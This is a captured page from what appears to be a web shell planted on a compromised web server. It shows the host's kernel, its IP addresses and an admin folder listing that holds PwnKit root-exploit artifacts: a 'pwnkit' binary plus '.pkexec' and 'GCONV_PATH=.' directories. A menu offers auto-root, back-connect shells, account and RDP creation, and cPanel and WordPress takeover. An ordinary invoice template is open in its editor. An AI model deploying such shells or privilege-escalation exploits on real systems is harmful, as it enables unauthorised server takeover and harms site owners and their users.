Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.145.96.78
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
eco-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
checkbox-radio.php
31.96
KB
-rw-r--r--
components.php
89.01
KB
-rw-r--r--
data-table.php
11.55
KB
-rw-r--r--
email-templates-alert.html
9.62
KB
-rw-r--r--
email-templates-billing.html
16.7
KB
-rw-r--r--
empty.php
722
B
-rw-r--r--
error-404.php
1.91
KB
-rw-r--r--
forgot-password.php
2.57
KB
-rw-r--r--
form-fileupload.php
7.73
KB
-rw-r--r--
form-wizard.php
41.75
KB
-rw-r--r--
index.php
9.91
KB
-rw-r--r--
invoice.php
9.76
KB
-rw-r--r--
login.php
3.38
KB
-rw-r--r--
maintenance.php
3.62
KB
-rw-r--r--
modals.php
37.59
KB
-rw-r--r--
orderhistory.php
11.41
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
3.59
KB
-rw-r--r--
sweetalert.php
9.06
KB
-rw-r--r--
tables-basic.php
52.41
KB
-rw-r--r--
tables-datatable.php
30.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : invoice.php
<?php include("includes/top-header.php");?> <?php include("includes/side-header.php");?> <!-- Start Page Content here --> <div class="content-page"> <div class="content"> <!-- Start Content--> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="card-box"> <!-- <div class="panel-heading"> <h4>Invoice</h4> </div> --> <div class="panel-body"> <div class="clearfix"> <div class="float-left"> <h3>Adminto</h3> </div> <div class="float-right"> <h4>Invoice # <br> <strong>2016-04-23654789</strong> </h4> </div> </div> <hr> <div class="row"> <div class="col-md-12"> <div class="float-left mt-3"> <address> <strong>Twitter, Inc.</strong><br> 795 Folsom Ave, Suite 600<br> San Francisco, CA 94107<br> <abbr title="Phone">P:</abbr> (123) 456-7890 </address> </div> <div class="float-right mt-3"> <p><strong>Order Date: </strong> Jan 17, 2016</p> <p class="m-t-10"><strong>Order Status: </strong> <span class="label label-pink">Pending</span></p> <p class="m-t-10"><strong>Order ID: </strong> #123456</p> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="table-responsive"> <table class="table mt-4"> <thead> <tr><th>#</th> <th>Item</th> <th>Description</th> <th>Quantity</th> <th>Unit Cost</th> <th>Total</th> </tr></thead> <tbody> <tr> <td>1</td> <td>LCD</td> <td>Lorem ipsum dolor sit amet.</td> <td>1</td> <td>$380</td> <td>$380</td> </tr> <tr> <td>2</td> <td>Mobile</td> <td>Lorem ipsum dolor sit amet.</td> <td>5</td> <td>$50</td> <td>$250</td> </tr> <tr> <td>3</td> <td>LED</td> <td>Lorem ipsum dolor sit amet.</td> <td>2</td> <td>$500</td> <td>$1000</td> </tr> <tr> <td>4</td> <td>LCD</td> <td>Lorem ipsum dolor sit amet.</td> <td>3</td> <td>$300</td> <td>$900</td> </tr> <tr> <td>5</td> <td>Mobile</td> <td>Lorem ipsum dolor sit amet.</td> <td>5</td> <td>$80</td> <td>$400</td> </tr> </tbody> </table> </div> </div> </div> <div class="row"> <div class="col-xl-6 col-6"> <div class="clearfix mt-4"> <h5 class="small text-dark">PAYMENT TERMS AND POLICIES</h5> <small> All accounts are to be paid within 7 days from receipt of invoice. To be paid by cheque or credit card or direct payment online. If account is not paid within 7 days the credits details supplied as confirmation of work undertaken will be charged the agreed quoted fee noted above. </small> </div> </div> <div class="col-xl-3 col-6 offset-xl-3"> <p class="text-right"><b>Sub-total:</b> 2930.00</p> <p class="text-right">Discout: 12.9%</p> <p class="text-right">VAT: 12.9%</p> <hr> <h3 class="text-right">USD 2930.00</h3> </div> </div> <hr> <div class="d-print-none"> <div class="float-right"> <a href="javascript:window.print()" class="btn btn-dark waves-effect waves-light"><i class="fa fa-print"></i></a> <a href="#" class="btn btn-primary waves-effect waves-light">Submit</a> </div> <div class="clearfix"></div> </div> </div> </div> </div> </div> </div> </div> <!-- content --> <!-- Footer Start --> <?php include("includes/copyright-footer.php");?> <!-- end Footer --> </div> <!-- End Page content --> </div> <!-- END wrapper --> <?php include("includes/footer.php");?>
Close